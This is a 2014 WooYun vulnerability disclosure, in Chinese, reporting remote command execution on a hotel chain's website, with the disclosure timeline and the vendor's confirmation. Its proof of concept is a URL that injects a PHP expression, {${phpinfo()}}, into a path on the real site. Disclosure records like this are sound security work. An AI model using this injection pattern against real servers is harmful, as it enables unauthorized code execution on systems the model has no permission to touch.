[公开漏洞]橘子水晶酒店任意命令执行漏洞 - 漏洞预警

橘子水晶酒店任意命令执行漏洞相关厂商： orangehotel.com.cn 漏洞作者：路人甲提交时间：2014-05-13 09:56 公开时间：2014-06-27 09:56 漏洞类型：命令执行危害等级：高自评Rank：15 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签：远程命令执行远程代码执行漏洞详情披露状态：

2014-05-13：细节已通知厂商并且等待厂商处理中
2014-05-13：厂商已经确认，细节仅向厂商公开
2014-05-23：细节向核心白帽子及相关领域专家公开
2014-06-02：细节向普通白帽子公开
2014-06-12：细节向实习白帽子公开
2014-06-27：细节向公众公开

简要描述：

橘子水晶酒店任意命名执行漏洞

详细说明：

橘子水晶酒店任意命名执行漏洞

http://www.orangehotel.com.cn/nanjing/juzishuijingjiudianyixianqiao.html/__hash__/0945b6383ca23fbdc4398447d22ac09d/BF/0/confirm/%7B$%7Bphpinfo()%7D%7D

漏洞证明：

http://www.orangehotel.com.cn/nanjing/juzishuijingjiudianyixianqiao.html/__hash__/0945b6383ca23fbdc4398447d22ac09d/BF/0/confirm/%7B$%7Bphpinfo()%7D%7D

修复方案：

不懂

危害等级：高

漏洞Rank：10

确认时间：2014-05-13 14:34

厂商回复：

非常感谢